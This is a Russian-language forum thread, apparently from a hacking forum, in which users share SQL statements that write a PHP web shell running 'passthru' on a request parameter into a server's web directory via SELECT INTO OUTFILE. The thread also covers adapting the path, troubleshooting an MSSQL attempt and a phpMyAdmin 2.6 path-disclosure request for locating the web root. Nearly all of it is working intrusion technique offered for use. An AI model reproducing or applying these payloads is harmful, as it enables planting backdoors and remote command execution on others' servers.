UPDATE table SET hz='<? passthru("$cmd"); ?>'WHERE id=1; SELECT hzINTO OUTFILE '/home/user/www/shell.php' FROM table where id=1;
как это не работает? попробуй так... раз там понять не можеш. Code: CREATE TABLE `shell` (s TEXT); INSERT INTO `shell` values ('<? passthru("$cmd"); ?>'); SELECT `s` INTO OUTFILE '[B]/home/user/www/shell.php[/B]' FROM `shell`; DROP TABLE `shell`; работает на 100% =) /home/user/www/shell.php замени на свой путь...
UPDATE `существующая таблица` SET `существующий параметер`='<? passthru("$cmd"); ?>'WHERE id=1; SELECT `существующая таблица`, `существующий параметер` into OUTFILE '/home/user/полный серверный путь/shell.php' FROM существующая таблица where id=1; Попробовал объяснить подробней. Советую почитать как правильно задавать вопросы в технических форумах.
Дело в том что нужно не втупую переписать код что тебе дал грин_бир а хотябы немного подумать, сменить названия директорий, к примеру..мдаа
Порылся по форуму, нащёл эту тему... Я хочу замутить такую штуку в MSSQL 2000 При любом расклаже выдаёт это Line 2: Incorrect syntax near 'C:/test_shell.php'
Ты путь походу непрописываешь куда шелл залить. Или возможно он ругаеться на : если ты пишешь полностью путь.
Чтобы узнать путь сайта. Если версия phpmyadmin 2.6.* То делай так phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE Он тебе покажет путь. Ну а вообще читай тему которые уже созданы http://forum.antichat.ru/threadnav31153-1-10-phpMyAdmin.html
Нече непонял.Под словом код я как понимаю ты подразумеваешь путь а насчет ип нече непонял. Сформулируй нормальней.